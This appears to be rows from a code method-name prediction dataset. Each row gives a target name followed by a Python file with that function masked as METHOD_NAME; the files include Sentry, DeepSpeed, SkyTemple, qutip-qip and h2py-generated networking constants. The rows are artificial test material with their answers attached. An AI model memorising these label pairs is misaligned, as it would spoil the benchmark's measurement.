original_wsgi_app = falcon_app_class.__call__
def sentry_patched_wsgi_app(self, env, start_response):
# type: (falcon.API, Any, Any) -> Any
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is None:
return original_wsgi_app(self, env, start_response)
sentry_wrapped = SentryWsgiMiddleware(
lambda envi, start_resp: original_wsgi_app(self, envi, start_resp)
)
return sentry_wrapped(env, start_response)
falcon_app_class.__call__ = sentry_patched_wsgi_app
def _patch_handle_exception():
# type: () -> None
original_handle_exception = falcon_app_class._handle_exception
def sentry_patched_handle_exception(self, *args):
# type: (falcon.API, *Any) -> Any
# NOTE(jmagnusson): falcon 2.0 changed falcon.API._handle_exception
# method signature from `(ex, req, resp, params)` to
# `(req, resp, ex, params)`
if isinstance(args[0], Exception):
ex = args[0]
else:
ex = args[2]
was_handled = original_handle_exception(self, *args)
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is not None and _exception_leads_to_http_5xx(ex):
# If an integration is there, a client has to be there.
client = hub.client # type: Any
event, hint = event_from_exception(
ex,
client_options=client.options,
mechanism={"type": "falcon", "handled": False},
)
hub.capture_event(event, hint=hint)
return was_handled
falcon_app_class._handle_exception = sentry_patched_handle_exception
def _patch_prepare_middleware():
# type: () -> None
original_prepare_middleware = falcon_helpers.prepare_middleware
def sentry_patched_prepare_middleware(
middleware=None, independent_middleware=False
):
# type: (Any, Any) -> Any
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is not None:
middleware = [SentryFalconMiddleware()] + (middleware or [])
return original_prepare_middleware(middleware, independent_middleware)
falcon_helpers.prepare_middleware = sentry_patched_prepare_middleware
def _exception_leads_to_http_5xx(ex):
# type: (Exception) -> bool
is_server_error = isinstance(ex, falcon.HTTPError) and (ex.status or "").startswith(
"5"
)
is_unhandled_error = not isinstance(
ex, (falcon.HTTPError, falcon.http_status.HTTPStatus)
)
return is_server_error or is_unhandled_error
def METHOD_NAME(event, transaction_style, request):
# type: (Dict[str, Any], str, falcon.Request) -> None
name_for_style = {
"uri_template": request.uri_template,
"path": request.path,
}
event["transaction"] = name_for_style[transaction_style]
event["transaction_info"] = {"source": SOURCE_FOR_STYLE[transaction_style]}
def _make_request_event_processor(req, integration):
# type: (falcon.Request, FalconIntegration) -> EventProcessor
def event_processor(event, hint):
# type: (Dict[str, Any], Dict[str, Any]) -> Dict[str, Any]
METHOD_NAME(event, integration.transaction_style, req)
with capture_internal_exceptions():
FalconRequestExtractor(req).extract_into_event(event)
return event
return event_processor | null |
test pipe inference schedule laststage | # Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: Apache-2.0
# DeepSpeed Team
import pytest
import deepspeed.runtime.pipe.schedule as schedule
def _count_type(cmds, classtype):
return len(list(filter(lambda c: type(c) == classtype, cmds)))
def test_pipe_inference_schedule_singlestage():
sched = schedule.InferenceSchedule(micro_batches=4, stages=1, stage_id=0)
assert sched.num_micro_batches == 4
full = list(iter(sched))
for idx, cmds in enumerate(full):
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
assert len(full) == sched.num_micro_batches
def test_pipe_train_schedule_singlestage():
sched = schedule.TrainSchedule(micro_batches=4, stages=1, stage_id=0)
assert sched.num_micro_batches == 4
full = list(iter(sched))
for idx, cmds in enumerate(full):
if (idx % 2) != 0:
assert (len(cmds) == 1) or (len(cmds) == 4)
assert type(cmds[0]) == schedule.BackwardPass
else:
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
assert len(full) == sched.num_micro_batches * 2
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def test_pipe_inference_schedule_firststage(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=0)
assert sched.num_micro_batches == micro_batches
full = list(iter(sched))
for idx, cmds in enumerate(full):
# Ensure we don't send an activation the first step
if idx == 0:
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
continue
# the last active step is only a send
if idx == sched.num_micro_batches:
assert len(cmds) == 1
assert type(cmds[0]) == schedule.SendActivation
continue
# no work later on
if idx > sched.num_micro_batches:
assert len(cmds) == 0
continue
# Normally we need to load/forward/send
assert len(cmds) == 3
assert _count_type(cmds, schedule.LoadMicroBatch) == 1
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.SendActivation) == 1
assert len(full) == micro_batches + stages - 1
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def test_pipe_inference_schedule_midstage(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=1)
full = list(iter(sched))
for idx, cmds in enumerate(full):
if idx < sched.stage:
assert len(cmds) == 0
continue
if idx == sched.stage + sched.num_micro_batches:
assert len(cmds) == 1
assert type(cmds[0]) == schedule.SendActivation
continue
if idx > sched.stage + sched.num_micro_batches:
assert len(cmds) == 0
continue
assert _count_type(cmds, schedule.LoadMicroBatch) == 0
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.RecvActivation) == 1
if idx > sched.stage:
assert _count_type(cmds, schedule.SendActivation) == 1
assert len(full) == micro_batches + stages - 1
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def METHOD_NAME(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=2)
full = list(iter(sched))
for idx, cmds in enumerate(full):
if idx < sched.stage or idx > sched.stage + sched.num_micro_batches:
assert len(cmds) == 0
continue
assert _count_type(cmds, schedule.LoadMicroBatch) == 1
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.RecvActivation) == 1
assert _count_type(cmds, schedule.SendActivation) == 0
assert len(full) == micro_batches + stages - 1
def test_pipe_schedule_firststage():
sched = schedule.TrainSchedule(micro_batches=8, stages=3, stage_id=0)
for cmds in sched:
assert all(instr.__class__ != schedule.SendGrad for instr in cmds)
assert all(instr.__class__ != schedule.RecvActivation for instr in cmds)
for instr in cmds:
if isinstance(instr, schedule.BufferOpInstruction):
assert 0 <= instr.buffer_id < sched.num_pipe_buffers()
def test_pipe_schedule_laststage():
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=2)
assert len(list(iter(sched))) == 2 * (sched.micro_batches + sched.stages - 1)
for cmds in sched:
assert all(instr.__class__ != schedule.SendActivation for instr in cmds)
assert all(instr.__class__ != schedule.RecvGrad for instr in cmds)
def test_pipe_stagequery():
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=0)
assert sched.is_first_stage
assert not sched.is_last_stage
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=1)
assert not sched.is_first_stage
assert not sched.is_last_stage
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=2)
assert not sched.is_first_stage
assert sched.is_last_stage | null |
i n classb | # Generated by h2py from /usr/include/netinet/in.h
IPPROTO_IP = 0
IPPROTO_HOPOPTS = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_IPV4 = 4
IPPROTO_IPIP = IPPROTO_IPV4
IPPROTO_TCP = 6
IPPROTO_ST = 7
IPPROTO_EGP = 8
IPPROTO_PIGP = 9
IPPROTO_RCCMON = 10
IPPROTO_NVPII = 11
IPPROTO_PUP = 12
IPPROTO_ARGUS = 13
IPPROTO_EMCON = 14
IPPROTO_XNET = 15
IPPROTO_CHAOS = 16
IPPROTO_UDP = 17
IPPROTO_MUX = 18
IPPROTO_MEAS = 19
IPPROTO_HMP = 20
IPPROTO_PRM = 21
IPPROTO_IDP = 22
IPPROTO_TRUNK1 = 23
IPPROTO_TRUNK2 = 24
IPPROTO_LEAF1 = 25
IPPROTO_LEAF2 = 26
IPPROTO_RDP = 27
IPPROTO_IRTP = 28
IPPROTO_TP = 29
IPPROTO_BLT = 30
IPPROTO_NSP = 31
IPPROTO_INP = 32
IPPROTO_SEP = 33
IPPROTO_3PC = 34
IPPROTO_IDPR = 35
IPPROTO_XTP = 36
IPPROTO_DDP = 37
IPPROTO_CMTP = 38
IPPROTO_TPXX = 39
IPPROTO_IL = 40
IPPROTO_IPV6 = 41
IPPROTO_SDRP = 42
IPPROTO_ROUTING = 43
IPPROTO_FRAGMENT = 44
IPPROTO_IDRP = 45
IPPROTO_RSVP = 46
IPPROTO_GRE = 47
IPPROTO_MHRP = 48
IPPROTO_BHA = 49
IPPROTO_ESP = 50
IPPROTO_AH = 51
IPPROTO_INLSP = 52
IPPROTO_SWIPE = 53
IPPROTO_NHRP = 54
IPPROTO_ICMPV6 = 58
IPPROTO_NONE = 59
IPPROTO_DSTOPTS = 60
IPPROTO_AHIP = 61
IPPROTO_CFTP = 62
IPPROTO_HELLO = 63
IPPROTO_SATEXPAK = 64
IPPROTO_KRYPTOLAN = 65
IPPROTO_RVD = 66
IPPROTO_IPPC = 67
IPPROTO_ADFS = 68
IPPROTO_SATMON = 69
IPPROTO_VISA = 70
IPPROTO_IPCV = 71
IPPROTO_CPNX = 72
IPPROTO_CPHB = 73
IPPROTO_WSN = 74
IPPROTO_PVP = 75
IPPROTO_BRSATMON = 76
IPPROTO_ND = 77
IPPROTO_WBMON = 78
IPPROTO_WBEXPAK = 79
IPPROTO_EON = 80
IPPROTO_VMTP = 81
IPPROTO_SVMTP = 82
IPPROTO_VINES = 83
IPPROTO_TTP = 84
IPPROTO_IGP = 85
IPPROTO_DGP = 86
IPPROTO_TCF = 87
IPPROTO_IGRP = 88
IPPROTO_OSPFIGP = 89
IPPROTO_SRPC = 90
IPPROTO_LARP = 91
IPPROTO_MTP = 92
IPPROTO_AX25 = 93
IPPROTO_IPEIP = 94
IPPROTO_MICP = 95
IPPROTO_SCCSP = 96
IPPROTO_ETHERIP = 97
IPPROTO_ENCAP = 98
IPPROTO_APES = 99
IPPROTO_GMTP = 100
IPPROTO_IPCOMP = 108
IPPROTO_PIM = 103
IPPROTO_PGM = 113
IPPROTO_DIVERT = 254
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPROTO_DONE = 257
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPORT_HIFIRSTAUTO = 49152
IPPORT_HILASTAUTO = 65535
IPPORT_RESERVEDSTART = 600
def IN_CLASSA(i): return (((u_int32_t)(i) & 0x80000000) == 0)
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = 0x00ffffff
IN_CLASSA_MAX = 128
def METHOD_NAME(i): return (((u_int32_t)(i) & 0xc0000000) == 0x80000000)
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = 0x0000ffff
IN_CLASSB_MAX = 65536
def IN_CLASSC(i): return (((u_int32_t)(i) & 0xe0000000) == 0xc0000000)
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = 0x000000ff
def IN_CLASSD(i): return (((u_int32_t)(i) & 0xf0000000) == 0xe0000000)
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 28
IN_CLASSD_HOST = 0x0fffffff
def IN_MULTICAST(i): return IN_CLASSD(i)
def IN_EXPERIMENTAL(i): return (((u_int32_t)(i) & 0xf0000000) == 0xf0000000)
def IN_BADCLASS(i): return (((u_int32_t)(i) & 0xf0000000) == 0xf0000000)
INADDR_NONE = 0xffffffff
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 9
IP_MULTICAST_TTL = 10
IP_MULTICAST_LOOP = 11
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_MULTICAST_VIF = 14
IP_RSVP_ON = 15
IP_RSVP_OFF = 16
IP_RSVP_VIF_ON = 17
IP_RSVP_VIF_OFF = 18
IP_PORTRANGE = 19
IP_RECVIF = 20
IP_IPSEC_POLICY = 21
IP_FAITH = 22
IP_FW_ADD = 50
IP_FW_DEL = 51
IP_FW_FLUSH = 52
IP_FW_ZERO = 53
IP_FW_GET = 54
IP_FW_RESETLOG = 55
IP_DUMMYNET_CONFIGURE = 60
IP_DUMMYNET_DEL = 61
IP_DUMMYNET_FLUSH = 62
IP_DUMMYNET_GET = 64
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
IP_PORTRANGE_DEFAULT = 0
IP_PORTRANGE_HIGH = 1
IP_PORTRANGE_LOW = 2
IPPROTO_MAXID = (IPPROTO_AH + 1)
IPCTL_FORWARDING = 1
IPCTL_SENDREDIRECTS = 2
IPCTL_DEFTTL = 3
IPCTL_DEFMTU = 4
IPCTL_RTEXPIRE = 5
IPCTL_RTMINEXPIRE = 6
IPCTL_RTMAXCACHE = 7
IPCTL_SOURCEROUTE = 8
IPCTL_DIRECTEDBROADCAST = 9
IPCTL_INTRQMAXLEN = 10
IPCTL_INTRQDROPS = 11
IPCTL_STATS = 12
IPCTL_ACCEPTSOURCEROUTE = 13
IPCTL_FASTFORWARDING = 14
IPCTL_KEEPFAITH = 15
IPCTL_GIF_TTL = 16
IPCTL_MAXID = 17
# Included from netinet6/in6.h
# Included from sys/queue.h
def SLIST_HEAD_INITIALIZER(head): return \
def SLIST_ENTRY(type): return \
def STAILQ_HEAD_INITIALIZER(head): return \
def STAILQ_ENTRY(type): return \
def LIST_HEAD_INITIALIZER(head): return \
def LIST_ENTRY(type): return \
def TAILQ_HEAD_INITIALIZER(head): return \
def TAILQ_ENTRY(type): return \
def CIRCLEQ_ENTRY(type): return \
__KAME_VERSION = "20000701/FreeBSD-current"
IPV6PORT_RESERVED = 1024
IPV6PORT_ANONMIN = 49152
IPV6PORT_ANONMAX = 65535
IPV6PORT_RESERVEDMIN = 600
IPV6PORT_RESERVEDMAX = (IPV6PORT_RESERVED-1)
INET6_ADDRSTRLEN = 46
IPV6_ADDR_INT32_ONE = 1
IPV6_ADDR_INT32_TWO = 2
IPV6_ADDR_INT32_MNL = 0xff010000
IPV6_ADDR_INT32_MLL = 0xff020000
IPV6_ADDR_INT32_SMP = 0x0000ffff
IPV6_ADDR_INT16_ULL = 0xfe80
IPV6_ADDR_INT16_USL = 0xfec0
IPV6_ADDR_INT16_MLL = 0xff02
IPV6_ADDR_INT32_ONE = 0x01000000
IPV6_ADDR_INT32_TWO = 0x02000000
IPV6_ADDR_INT32_MNL = 0x000001ff
IPV6_ADDR_INT32_MLL = 0x000002ff
IPV6_ADDR_INT32_SMP = 0xffff0000
IPV6_ADDR_INT16_ULL = 0x80fe
IPV6_ADDR_INT16_USL = 0xc0fe
IPV6_ADDR_INT16_MLL = 0x02ff
def IN6_IS_ADDR_UNSPECIFIED(a): return \
def IN6_IS_ADDR_LOOPBACK(a): return \
def IN6_IS_ADDR_V4COMPAT(a): return \
def IN6_IS_ADDR_V4MAPPED(a): return \
IPV6_ADDR_SCOPE_NODELOCAL = 0x01
IPV6_ADDR_SCOPE_LINKLOCAL = 0x02
IPV6_ADDR_SCOPE_SITELOCAL = 0x05
IPV6_ADDR_SCOPE_ORGLOCAL = 0x08
IPV6_ADDR_SCOPE_GLOBAL = 0x0e
__IPV6_ADDR_SCOPE_NODELOCAL = 0x01
__IPV6_ADDR_SCOPE_LINKLOCAL = 0x02
__IPV6_ADDR_SCOPE_SITELOCAL = 0x05
__IPV6_ADDR_SCOPE_ORGLOCAL = 0x08
__IPV6_ADDR_SCOPE_GLOBAL = 0x0e
def IN6_IS_ADDR_LINKLOCAL(a): return \
def IN6_IS_ADDR_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return \
def IN6_IS_SCOPE_LINKLOCAL(a): return \
IPV6_OPTIONS = 1
IPV6_RECVOPTS = 5
IPV6_RECVRETOPTS = 6
IPV6_RECVDSTADDR = 7
IPV6_RETOPTS = 8
IPV6_SOCKOPT_RESERVED1 = 3
IPV6_UNICAST_HOPS = 4
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_LOOP = 11
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_PORTRANGE = 14
ICMP6_FILTER = 18
IPV6_PKTINFO = 19
IPV6_HOPLIMIT = 20
IPV6_NEXTHOP = 21
IPV6_HOPOPTS = 22
IPV6_DSTOPTS = 23
IPV6_RTHDR = 24
IPV6_PKTOPTIONS = 25
IPV6_CHECKSUM = 26
IPV6_BINDV6ONLY = 27
IPV6_IPSEC_POLICY = 28
IPV6_FAITH = 29
IPV6_FW_ADD = 30
IPV6_FW_DEL = 31
IPV6_FW_FLUSH = 32
IPV6_FW_ZERO = 33
IPV6_FW_GET = 34
IPV6_RTHDR_LOOSE = 0
IPV6_RTHDR_STRICT = 1
IPV6_RTHDR_TYPE_0 = 0
IPV6_DEFAULT_MULTICAST_HOPS = 1
IPV6_DEFAULT_MULTICAST_LOOP = 1
IPV6_PORTRANGE_DEFAULT = 0
IPV6_PORTRANGE_HIGH = 1
IPV6_PORTRANGE_LOW = 2
IPV6PROTO_MAXID = (IPPROTO_PIM + 1)
IPV6CTL_FORWARDING = 1
IPV6CTL_SENDREDIRECTS = 2
IPV6CTL_DEFHLIM = 3
IPV6CTL_DEFMTU = 4
IPV6CTL_FORWSRCRT = 5
IPV6CTL_STATS = 6
IPV6CTL_MRTSTATS = 7
IPV6CTL_MRTPROTO = 8
IPV6CTL_MAXFRAGPACKETS = 9
IPV6CTL_SOURCECHECK = 10
IPV6CTL_SOURCECHECK_LOGINT = 11
IPV6CTL_ACCEPT_RTADV = 12
IPV6CTL_KEEPFAITH = 13
IPV6CTL_LOG_INTERVAL = 14
IPV6CTL_HDRNESTLIMIT = 15
IPV6CTL_DAD_COUNT = 16
IPV6CTL_AUTO_FLOWLABEL = 17
IPV6CTL_DEFMCASTHLIM = 18
IPV6CTL_GIF_HLIM = 19
IPV6CTL_KAME_VERSION = 20
IPV6CTL_USE_DEPRECATED = 21
IPV6CTL_RR_PRUNE = 22
IPV6CTL_MAPPED_ADDR = 23
IPV6CTL_BINDV6ONLY = 24
IPV6CTL_RTEXPIRE = 25
IPV6CTL_RTMINEXPIRE = 26
IPV6CTL_RTMAXCACHE = 27
IPV6CTL_MAXID = 28 | null |
get view | # Copyright 2020-2023 Capypara and the SkyTemple Contributors
#
# This file is part of SkyTemple.
#
# SkyTemple is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SkyTemple is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SkyTemple. If not, see <https://www.gnu.org/licenses/>.
import logging
import os
import sys
from typing import TYPE_CHECKING, Optional, Dict, List
from xml.etree.ElementTree import Element, ElementTree
from skytemple.core.message_dialog import SkyTempleMessageDialog
from skytemple_files.common.xml_util import prettify
import cairo
from skytemple.core.error_handler import display_error
from skytemple_files.graphics.fonts.graphic_font.model import GraphicFont
from PIL import Image
from gi.repository import Gtk
from gi.repository.Gtk import ResponseType
from skytemple.controller.main import MainController
from skytemple.core.img_utils import pil_to_cairo_surface
from skytemple.core.module_controller import AbstractController
from skytemple_files.common.i18n_util import f, _
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from skytemple.module.misc_graphics.module import MiscGraphicsModule, FontOpenSpec
IMAGE_ZOOM = 4
MAX_ENTRIES = 10000
class GraphicFontController(AbstractController):
def __init__(self, module: 'MiscGraphicsModule', item: 'FontOpenSpec'):
self.module = module
self.spec = item
self.font: GraphicFont = self.module.get_graphic_font(self.spec) # type: ignore
assert self.font is not None
self.builder: Gtk.Builder = None # type: ignore
def METHOD_NAME(self) -> Gtk.Widget:
self.builder = self._get_builder(__file__, 'graphic_font.glade')
self._init_font()
self.builder.connect_signals(self)
self.builder.get_object('draw').connect('draw', self.draw)
return self.builder.get_object('editor')
def on_export_clicked(self, w: Gtk.MenuToolButton):
dialog = Gtk.FileChooserNative.new(
_("Export font in folder..."),
MainController.window(),
Gtk.FileChooserAction.SELECT_FOLDER,
_('_Save'), None
)
response = dialog.run()
fn = dialog.get_filename()
dialog.destroy()
if response == Gtk.ResponseType.ACCEPT:
assert self.font
for i in range(self.font.get_nb_entries()):
e = self.font.get_entry(i)
if e:
path = os.path.join(fn, f'{i:0>4}.png')
e.save(path)
def on_import_clicked(self, w: Gtk.MenuToolButton):
md = SkyTempleMessageDialog(
MainController.window(),
Gtk.DialogFlags.DESTROY_WITH_PARENT, Gtk.MessageType.INFO,
Gtk.ButtonsType.OK,
_("To import, select a folder containing all the files that were created when exporting the font.\n"
"IMPORTANT: All image files must be indexed PNGs and use the same palette!"),
title=_("Import Font")
)
md.run()
md.destroy()
fdialog = Gtk.FileChooserNative.new(
_("Import font from folder..."),
MainController.window(),
Gtk.FileChooserAction.SELECT_FOLDER,
None, None
)
response = fdialog.run()
fn = fdialog.get_filename()
fdialog.destroy()
if response == Gtk.ResponseType.ACCEPT:
assert self.builder
dialog: Gtk.Dialog = self.builder.get_object('dialog_import')
self.builder.get_object('nb_entries_import').set_increments(1,1)
self.builder.get_object('nb_entries_import').set_range(1, MAX_ENTRIES-1)
self.builder.get_object('nb_entries_import').set_text(str(self.font.get_nb_entries())) # type: ignore
dialog.set_attached_to(MainController.window())
dialog.set_transient_for(MainController.window())
resp = dialog.run()
dialog.hide()
if resp == Gtk.ResponseType.OK:
try:
lst_entries: List[Optional[Image.Image]] = []
for i in range(int(self.builder.get_object('nb_entries_import').get_text())):
path = os.path.join(fn, f'{i:0>4}.png')
if os.path.exists(path):
lst_entries.append(Image.open(path, 'r'))
else:
lst_entries.append(None)
self.font.set_entries(lst_entries) # type: ignore
self.module.mark_font_as_modified(self.spec)
except Exception as err:
display_error(
sys.exc_info(),
str(err),
_("Error importing font.")
)
self._init_font()
def _init_font(self):
self.builder.get_object('entry_id').set_text(str(0))
self.builder.get_object('entry_id').set_increments(1,1)
self.builder.get_object('entry_id').set_range(0, self.font.get_nb_entries()-1)
self._switch_entry()
def on_entry_id_changed(self, widget):
try:
val = int(widget.get_text())
except ValueError:
val = -1
if val<0:
val = 0
widget.set_text(str(val))
elif val>=self.font.get_nb_entries():
val=self.font.get_nb_entries()-1
widget.set_text(str(val))
self._switch_entry()
def on_nb_entries_import_changed(self, widget):
try:
val = int(widget.get_text())
except ValueError:
val = -1
if val<=0:
val = 1
widget.set_text(str(val))
elif val>=MAX_ENTRIES+1:
val=MAX_ENTRIES
widget.set_text(str(val))
def _switch_entry(self):
surface = self.font.get_entry(int(self.builder.get_object('entry_id').get_text()))
stack: Gtk.Stack = self.builder.get_object('entry_stack')
if surface:
stack.set_visible_child(self.builder.get_object('entry_viewer'))
surface = surface.resize((surface.width*IMAGE_ZOOM, surface.height*IMAGE_ZOOM))
self.surface = pil_to_cairo_surface(surface.convert('RGBA'))
self.builder.get_object('draw').queue_draw()
else:
stack.set_visible_child(self.builder.get_object('no_entry_label'))
self.surface = pil_to_cairo_surface(Image.new('RGBA', size=(1,1)))
def draw(self, wdg, ctx: cairo.Context, *args):
if self.surface:
wdg.set_size_request(self.surface.get_width(), self.surface.get_height())
ctx.fill()
ctx.set_source_surface(self.surface, 0, 0)
ctx.get_source().set_filter(cairo.Filter.NEAREST)
ctx.paint()
return True | null |
test compiling gates different sampling number | import pytest
import numpy as np
from numpy.testing import assert_array_equal
from scipy import integrate
from qutip_qip.compiler.gatecompiler import _default_window_t_max
from qutip_qip.device import (
DispersiveCavityQED, CircularSpinChain, LinearSpinChain)
from qutip_qip.compiler import (
SpinChainCompiler, CavityQEDCompiler, Instruction, GateCompiler
)
from qutip_qip.circuit import QubitCircuit
from qutip import basis, fidelity
def test_compiling_with_scheduler():
"""
Here we test if the compiling with scheduler works properly.
The non scheduled pulse should be twice as long as the scheduled one.
The numerical results are tested in test_device.py
"""
circuit = QubitCircuit(2)
circuit.add_gate("X", 0)
circuit.add_gate("X", 1)
processor = DispersiveCavityQED(2)
processor.load_circuit(circuit, schedule_mode=None)
tlist = processor.get_full_tlist()
time_not_scheduled = tlist[-1]-tlist[0]
processor.load_circuit(circuit, schedule_mode="ASAP")
tlist = processor.get_full_tlist()
time_scheduled1 = tlist[-1]-tlist[0]
processor.load_circuit(circuit, schedule_mode="ALAP")
tlist = processor.get_full_tlist()
time_scheduled2 = tlist[-1]-tlist[0]
assert(abs(time_scheduled1 * 2 - time_not_scheduled) < 1.0e-10)
assert(abs(time_scheduled2 * 2 - time_not_scheduled) < 1.0e-10)
def METHOD_NAME():
"""
Define compiler without a physical model.
Test compiling gates to pulses with different sampling number.
"""
class MockCompiler(GateCompiler):
def __init__(self, num_qubits, params=None):
super().__init__(num_qubits, params=params)
self.gate_compiler["U1"] = self.single_qubit_gate_compiler
self.gate_compiler["U2"] = self.two_qubit_gate_compiler
self.args.update({"params": params})
def single_qubit_gate_compiler(self, gate, args):
pulse_info = [("x", np.array([1.0] * 3))]
return [
Instruction(
gate, tlist=np.linspace(0, 2, 3), pulse_info=pulse_info
)
]
def two_qubit_gate_compiler(self, gate, args):
pulse_info = [("xx", np.array([2.0] * 5))]
return [
Instruction(
gate, tlist=np.linspace(0, 4, 5), pulse_info=pulse_info
)
]
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("U1", targets=0, arg_value=1.0)
circuit.add_gate("U2", targets=[0, 1], arg_value=1.0)
circuit.add_gate("U1", targets=0, arg_value=1.0)
compiler = MockCompiler(num_qubits=2)
compiled_tlists, compiled_coeffs = compiler.compile(circuit)
# Filter out the nonzero part of the pulse
# and check if they are correct.
np.testing.assert_array_equal(
compiled_tlists["x"][np.nonzero(compiled_coeffs["x"])[0]],
np.array([1, 2, 7, 8]),
)
np.testing.assert_array_equal(
compiled_tlists["xx"][np.nonzero(compiled_coeffs["xx"])[0]],
np.array([3, 4, 5, 6]),
)
# Test the compiler with a physical model.
class MyCompiler(GateCompiler): # compiler class
def __init__(self, num_qubits, params):
super(MyCompiler, self).__init__(num_qubits, params=params)
# pass our compiler function as a compiler for RX (rotation around X) gate.
self.gate_compiler["RX"] = self.rx_compiler
self.args.update({"params": params})
def rx_compiler(self, gate, args):
targets = gate.targets
coeff, tlist = self.generate_pulse_shape(
"hann",
1000,
maximum=args["params"]["sx"][targets[0]],
# The operator is Pauli Z/X/Y, without 1/2.
area=gate.arg_value / 2.0 / np.pi * 0.5,
)
pulse_info = [("sx" + str(targets[0]), coeff)]
return [Instruction(gate, tlist, pulse_info)]
spline_kind = [
pytest.param("step_func", id = "discrete"),
pytest.param("cubic", id = "continuos"),
]
schedule_mode = [
pytest.param("ASAP", id = "ASAP"),
pytest.param("ALAP", id="ALAP"),
pytest.param(False, id = "No schedule"),
]
@pytest.mark.parametrize("spline_kind", spline_kind)
@pytest.mark.parametrize("schedule_mode", schedule_mode)
def test_compiler_with_continous_pulse(spline_kind, schedule_mode):
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("X", targets=0)
circuit.add_gate("X", targets=1)
circuit.add_gate("X", targets=0)
processor = CircularSpinChain(num_qubits)
processor.spline_kind = spline_kind
gauss_compiler = MyCompiler(num_qubits, processor.params)
processor.load_circuit(
circuit, schedule_mode = schedule_mode, compiler=gauss_compiler)
result = processor.run_state(init_state = basis([2,2], [0,0]))
assert(abs(fidelity(result.states[-1],basis([2,2],[0,1])) - 1) < 1.e-5)
def rx_compiler_without_pulse_dict(gate, args):
"""
Define a gate compiler that does not use pulse_dict but directly
give the index of control pulses in the Processor.
"""
targets = gate.targets
g = args["params"]["sx"][targets[0]]
coeff = np.sign(gate.arg_value) * g
tlist = abs(gate.arg_value) / (2 * g) / np.pi/ 2
pulse_info = [(targets[0], coeff)]
return [Instruction(gate, tlist, pulse_info)]
def test_compiler_without_pulse_dict():
"""
Test for a compiler function without pulse_dict and using args.
"""
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("X", targets=[0])
circuit.add_gate("X", targets=[1])
processor = CircularSpinChain(num_qubits)
compiler = SpinChainCompiler(num_qubits, params=processor.params, setup="circular")
compiler.gate_compiler["RX"] = rx_compiler_without_pulse_dict
compiler.args = {"params": processor.params}
processor.load_circuit(circuit, compiler=compiler)
result = processor.run_state(basis([2,2], [0,0]))
assert(abs(fidelity(result.states[-1], basis([2,2], [1,1])) - 1.) < 1.e-6 )
def test_compiler_result_format():
"""
Test if compiler return correctly different kind of compiler result
and if processor can successfully read them.
"""
num_qubits = 1
circuit = QubitCircuit(num_qubits)
circuit.add_gate("RX", targets=[0], arg_value=np.pi/2)
